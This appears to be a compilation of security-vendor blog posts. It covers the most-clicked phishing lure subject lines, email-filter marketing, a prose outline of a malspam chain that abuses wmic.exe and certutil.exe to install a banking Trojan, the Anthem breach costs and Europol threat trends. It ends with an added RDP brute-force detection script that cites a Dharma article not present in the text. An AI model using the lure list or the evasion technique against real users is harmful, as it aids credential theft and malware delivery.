Microsoft: Multiple log in attempts
IT: IMPORTANT – NEW SERVER BACKUP
Wells Fargo: Irregular Activities Detected on Your Credit Card
LinkedIn: Your account is at risk!
Microsoft/Office 365: [Reminder]: your secured message
Coinbase: Your cryptocurrency wallet: Two-factor settings changed
The most commonly clicked phishing lures in Q3 were:
Top clicked simulation lures, ranked by percentage of emails clicked:
Password Check Required Immediately
You Have a New Voicemail
Your order is on the way
Change of Password Required Immediately
De-activation of [[email]] in Process
UPS Label Delivery 1ZBE312TNY00015011
Revised Vacation & Sick Time Policy
You’ve received a Document for Signature
Spam Notification: 1 New Messages
[ACTION REQUIRED] – Potential Acceptable Use Violation
The Importance of Blocking Phishing Attacks at their Source
If login credentials to email accounts, Office 365, Dropbox, and other cloud services are obtained by cybercriminals, the accounts can be plundered. Sensitive information can be stolen and Office 365/email accounts can be used for further phishing attacks on other employees. If malware is installed, cybercriminals can gain full control of infected devices. The cost of mitigating these attacks is considerable and a successful phishing attack can seriously damage a company’s reputation.
Due to the harm that can be caused by phishing, it is essential for businesses of all sizes to train staff how to identify phishing threats and implement a system that allows suspicious emails to be reported to security teams quickly. Resilience to phishing attacks can be greatly improved with an effective training program and phishing email simulations. It is also essential to deploy an effective email security solution that blocks threats and ensures they are not delivered to inboxes.
SpamTitan is a highly effective, easy to implement email filtering solution that blocks more than 99.9% of spam and phishing emails and 100% of known malware through dual anti-virus engines (Bitdefender and ClamAV). With SpamTitan protecting inboxes, businesses are less reliant on their employees’ ability to identify phishing threats.
SpamTitan subjects each incoming email to a barrage of checks to determine if a message is genuine and should be delivered or is potentially malicious and should be blocked. SpamTitan also performs checks on outbound emails to ensure that in the event that an email account is compromised, it cannot be used to send spam and phishing emails internally and to clients and contacts, thus helping to protect the reputation of the business.
Improve Office 365 Email Security with SpamTitan
There are more than 135 million subscribers to Office 365, and such high numbers make Office 365 a big target for cybercriminals. One of the main ways that Office 365 credentials are obtained is through phishing. Emails are crafted to bypass Office 365 defenses and hyperlinks are used to direct end users to fake Office 365 login pages where credentials are harvested.
Businesses that have adopted Office 365 are likely to still see a significant number of malicious emails delivered to inboxes. To enhance Office 365 security, a third-party email filtering control is required. If SpamTitan is installed on top of Office 365, a higher percentage of phishing emails and other email threats can be blocked at source.
To find out more about SpamTitan, including details of pricing and to register for a free trial, contact the TitanHQ team today. During the free trial you will discover just how much better SpamTitan is at blocking phishing attacks than standard Office 365 anti-spam controls.
A new Office 365 threat has been detected that stealthily installs malware by hiding communications and downloads by abusing legitimate Windows components.
New Office 365 Threat Uses Legitimate Windows Files to Hide Malicious Activity
The attack starts with malspam containing a malicious link embedded in an email. Various themes could be used to entice users into clicking the link, although one recent campaign masquerades as emails from the national postal service in Brazil.
The emails claim the postal service attempted to deliver a package, but the delivery failed as there was no one in. The tracking code for the package is included in the email and the user is requested to click the link in the email to receive the tracking information.
In this case, clicking the link triggers a popup asking the user to confirm the download of a zip file, which allegedly contains the tracking information. If the zip file is extracted, the user is required to click on a LNK file to receive the information. The LNK file runs cmd.exe, which executes wmic.exe, the Windows Management Instrumentation (WMI) command-line utility. This legitimate Windows file is used to communicate with the attacker’s C2 server and to create a copy of another Windows file, certutil.exe, in the %temp% folder under the name certis.exe. A script then instructs certis.exe to connect to a different C2 server to download malicious files.
The aim of this attack is to use legitimate Windows files to download the malicious payload: A banking Trojan. The use of legitimate Windows files for communication and downloading files helps the attackers bypass security controls and install the malicious payload undetected.
These Windows files have the capability to download other files for legitimate purposes, so it is hard for security teams to identify malicious activity. This campaign targets users in Brazil, but this Office 365 threat should be a concern for all users as other threat actors have also adopted this tactic to install malware.
Due to the difficulty of distinguishing between legitimate and malicious wmic.exe and certutil.exe activity, blocking an Office 365 threat such as this is easiest at the initial point of attack: preventing the malicious email from being delivered to an inbox and providing security awareness training to employees to help them identify this Office 365 threat. The latter is essential for all businesses. Employees can be turned into a strong last line of defense through security awareness training. The former can be achieved with a spam filtering solution such as SpamTitan. SpamTitan will prevent the last line of defense from being tested.
How to Block this Office 365 Threat with SpamTitan and Improve Email Security
Microsoft uses several techniques to identify malspam and prevent malicious messages from reaching users’ inboxes; however, while efforts have been made to improve the effectiveness of the spam filtering controls of Office 365, many malicious messages are still delivered.
To improve Office 365 security, a third-party spam filtering solution should be used. SpamTitan has been developed to allow easy integration into Office 365 and provides superior protection against a wide range of email threats.
SpamTitan uses a variety of methods to prevent malspam from being delivered to end users’ inboxes, including predictive techniques to identify threats that are misidentified by Office 365 security controls. These techniques ensure industry-leading catch rates in excess of 99.9% and prevent malicious emails from reaching inboxes.
Security Solutions for MSPs to Block Office 365 Threats
Many MSPs resell Office 365 licenses to their customers. Office 365 allows MSPs to capture new business, but the margins are small. By offering additional services to enhance Office 365 security, MSPs can make their Office 365 offering more desirable to businesses while improving the profitability of Office 365.
TitanHQ has been developing innovative email and web security solutions for more than 25 years. Those solutions have been developed from the ground up with MSPs for MSPs. Three solutions are ideal for use with Office 365 for compliance and to improve security – SpamTitan email filtering, WebTitan web filtering, and ArcTitan email archiving.
By incorporating these solutions into Office 365 packages, MSPs can provide clients with much greater value as well as significantly boosting the profitability of offering Office 365.
To find out more about each of these solutions, speak to TitanHQ. The MSP team will be happy to explain how the products work, how they can be implemented, and how they can boost margins on Office 365.
TitanHQ, the leading provider of web filtering, spam filtering, and email archiving solutions for managed service providers (MSPs), recently formed a strategic partnership with Datto Networking, the leading provider of MSP-delivered IT solutions to SMBs.
The partnership has seen TitanHQ’s advanced web filtering technology incorporated into the Datto Networking Appliance to ensure all users benefit from reliable and secure internet access.
TitanHQ’s web filtering technology provides enhanced protection from web-based threats while allowing acceptable internet usage policies to be easily enforced for all users at the organization, department, user group, or user level.
On October 18, 2018, Datto and TitanHQ will be hosting a webinar to explain the enhanced functionality of the Datto Networking Appliance to MSPs, including a deep dive into the new web filtering technology.
Webinar: Datto Networking & Titan HQ Deliver Enhanced Web Content Filtering
Date: Thursday, October 18th
Time: 11AM ET | 8AM PT | 4PM GMT/BST
Speakers: John Tippett, VP, Datto Networking; Andy Katz, Network Solutions Engineer; Rocco Donnino, EVP of Strategic Alliances, TitanHQ
In 2015, Anthem Inc. experienced a colossal data breach in which 78.8 million health plan records were stolen. This year, the health insurer settled a class action lawsuit over the breach for $115 million, and OCR has now agreed to a $16 million Anthem data breach settlement.
It Started with a Spear Phishing Email…
The Anthem data breach came as a huge shock back in February 2015, due to the sheer scale of the breach. Healthcare data breaches were common, but the Anthem data breach was in a different league.
Prior to the announcement, the unenviable record was held by Science Applications International Corporation, a vendor used by healthcare organizations, that experienced a 4.9 million record breach in 2011. The Anthem data breach was on an entirely different scale.
The hacking group behind the Anthem data breach was clearly skilled. Mandiant, the cybersecurity firm that assisted with the investigation, suspected the attack was a nation-state sponsored cyberattack. The hackers managed to gain access to Anthem’s data warehouse and exfiltrated a huge volume of data undetected. The time from the initial attack to discovery was almost a year.
While the attack was sophisticated, a foothold in the network was not gained through an elaborate hack or zero-day exploit but through phishing emails.
At least one employee responded to a spear phishing email, sent to one of Anthem’s subsidiaries, which gave the attackers the entry point they needed to launch a further attack and gain access to Anthem’s health plan member database.
The Anthem Data Breach Settlement is the Largest Ever Penalty for a Healthcare Data Breach
The U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) investigates healthcare data breaches that result in the exposure or theft of 500 or more records. An in-depth investigation of the Anthem breach was therefore a certainty given its scale. A penalty for non-compliance with Health Insurance Portability and Accountability Act (HIPAA) Rules was a very likely outcome as HIPAA requires healthcare organizations to safeguard health data. The scale of the breach also made it likely that it would result in the largest ever penalty for a healthcare data breach.
Before the Anthem data breach settlement, the largest penalty for a healthcare data breach was $5.55 million, which was agreed between OCR and Advocate Health Care Network in 2016. The Anthem data breach settlement was almost three times that amount, which reflected the seriousness of the breach, the number of people impacted, and the extent to which HIPAA Rules were alleged to have been violated.
OCR alleged that Anthem Inc. had violated five provisions of HIPAA Rules, and by doing so failed to prevent the breach and limit its severity. The Anthem data breach settlement was however agreed with no admission of liability.
The regulatory fine represents a small fraction of the total cost of the Anthem data breach. On top of the Anthem data breach settlement with OCR, Anthem faced multiple lawsuits in the wake of the data breach. The consolidated class action lawsuit was settled by Anthem in January 2018 for $115 million.
The class action settlement document indicated Anthem had already paid $2.5 million to consultants in the wake of the breach, $31 million was spent mailing notification letters, $115 million went on improvements to security, and $112 million was paid to provide identity theft protection and credit monitoring services to affected plan members.
With the $115 million class action settlement and the $16 million OCR settlement, the total cost of the Anthem data breach comes to $391.5 million.
At $391.5 million, this is the most expensive healthcare phishing attack by some distance, and the cost clearly highlights just how important it is to adopt a defense-in-depth strategy to protect against phishing attacks.
Cybercriminals have turned to cryptocurrency mining malware as an easy, low-risk way of making money although ransomware is still the main malware threat according to Europol.
While it was common for large-scale spam email campaigns to be sent to random recipients to spread ransomware, tactics used to infect devices with the file-encrypting malware are changing.
There has been a shift away from ‘spray and pray’ spam campaigns involving millions of messages toward targeted attacks on businesses. Organized cybercriminal gangs are researching victims and are conducting highly targeted attacks that first involve compromising a network before manually deploying ransomware.
The cybercriminal group behind SamSam ransomware has been particularly prolific. Companies that have failed to address software vulnerabilities are attacked and access is gained to their networks. The SamSam group also conducts brute force attacks on RDP to gain access to business networks. Once access is gained, ransomware is manually installed on as many computers as possible, before the encryption routine is started across all infected devices. With a large number of devices encrypted, the ransom demand can be much higher – typically around $50,000 per company. The group has collected at least $6 million in ransom payments to date.
Europol warns that ransomware attacks will continue to be a major threat over the following years, although a new threat is emerging – cryptojacking malware. This form of malware is used to hijack computer processors to mine cryptocurrency. Europol warns that if the rise in the use of cryptojacking malware continues it may overtake ransomware and become the biggest malware threat.
Not only does cryptojacking offer considerable rewards, in many cases use of the malware is not classed as illegal, such as when it is installed on websites. This not only means that cybercriminals can generate considerable profits, but the risk involved in these types of attacks is far lower than using ransomware.
Cybercriminals are still extensively using social engineering techniques to fool consumers and employees into disclosing sensitive personal information and login credentials. Social engineering is also extensively used to trick employees into making fraudulent bank transfers. Phishing is the most common form of social engineering, although vishing – voice phishing – and smishing – SMS phishing are also used. Europol notes that social engineering is still the engine of many cybercrimes.
While exploit kits have been extensively used to silently download malware, Europol notes that the use of exploit kits continues to decline. The main attack vectors are spam email and RDP brute-forcing.
As-a-service cyberattacks continue to be a major problem. DDoS-as-a-service and ransomware-as-a-service allow low-level and relatively unskilled individuals to conduct cyberattacks. Europol recommends law enforcement should concentrate on locating and shutting down these criminal operations to make it much harder for low-level criminals to conduct cyberattacks that would otherwise be beyond their skill level.
With spam email still a major attack vector, it is essential for businesses to implement cybersecurity solutions to prevent malicious emails from being delivered to inboxes and ensure cybersecurity best practices are adopted to make them less susceptible to attack. With phishing the main form of social engineering, anti-phishing training for employees is vital.
RDP attacks are now commonplace, so steps must be taken by businesses to block this attack vector, such as disabling RDP if it is not required, using extremely strong passwords for RDP, limiting the users who can log in, configuring account lockouts after a set number of failed login attempts, and using RDP gateways.
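The account-lockout advice here and in the Dharma article above comes down to counting failures per source and account inside a time window. The following detector is an added example, not TitanHQ code: it runs over constructed log lines modelled on Windows Security events 4625 (failed logon) and 4624 (successful logon) with logon type 10 (RemoteInteractive, i.e. RDP), raises a lockout finding when the threshold is reached, and separately flags a success that follows such a burst, which is the pattern the Dharma operators rely on when no lockout is configured. Accounts, addresses and times are placeholders.

```python
"""Sliding-window RDP brute-force and lockout detection (added example)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

RDP_LOGON_TYPE = "10"          # RemoteInteractive
FAILED, SUCCESS = "4625", "4624"


def parse_line(line: str):
    """Constructed CSV shape: timestamp,event_id,account,source_ip,logon_type."""
    ts, event_id, account, src_ip, logon_type = line.strip().split(",")
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), event_id, account.lower(), src_ip, logon_type


def analyse(lines, threshold: int = 5, window: timedelta = timedelta(minutes=5)) -> list:
    """Return findings as (rule, account, source_ip, timestamp) tuples.

    'lockout' fires the moment `threshold` RDP failures from one source against
    one account fall inside `window`; 'success_after_burst' fires when a
    successful RDP logon arrives while that many failures are still in the window.
    """
    recent = defaultdict(deque)   # (account, ip) -> timestamps of failures in window
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ts, event_id, account, ip, logon_type = parse_line(line)
        if logon_type != RDP_LOGON_TYPE:
            continue               # only RDP logons are in scope here
        q = recent[(account, ip)]
        while q and ts - q[0] > window:
            q.popleft()            # expire failures older than the window
        if event_id == FAILED:
            q.append(ts)
            if len(q) == threshold:   # fire once, when the threshold is first reached
                findings.append(("lockout", account, ip, ts))
        elif event_id == SUCCESS and len(q) >= threshold:
            findings.append(("success_after_burst", account, ip, ts))
    return findings


# Constructed sample log: a legitimate typo by alice, then a guessing run from
# one address against the administrator account that ends in a success.
SAMPLE_LOG = """\
2018-10-15T01:58:00Z,4625,alice,10.0.0.5,10
2018-10-15T01:58:20Z,4624,alice,10.0.0.5,10
2018-10-15T02:00:00Z,4625,administrator,198.51.100.23,10
2018-10-15T02:01:00Z,4625,administrator,198.51.100.23,10
2018-10-15T02:02:00Z,4625,administrator,198.51.100.23,10
2018-10-15T02:02:30Z,4625,administrator,198.51.100.23,3
2018-10-15T02:03:00Z,4625,administrator,198.51.100.23,10
2018-10-15T02:04:00Z,4625,administrator,198.51.100.23,10
2018-10-15T02:05:00Z,4625,administrator,198.51.100.23,10
2018-10-15T02:06:00Z,4624,administrator,198.51.100.23,10
""".splitlines()

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding)
```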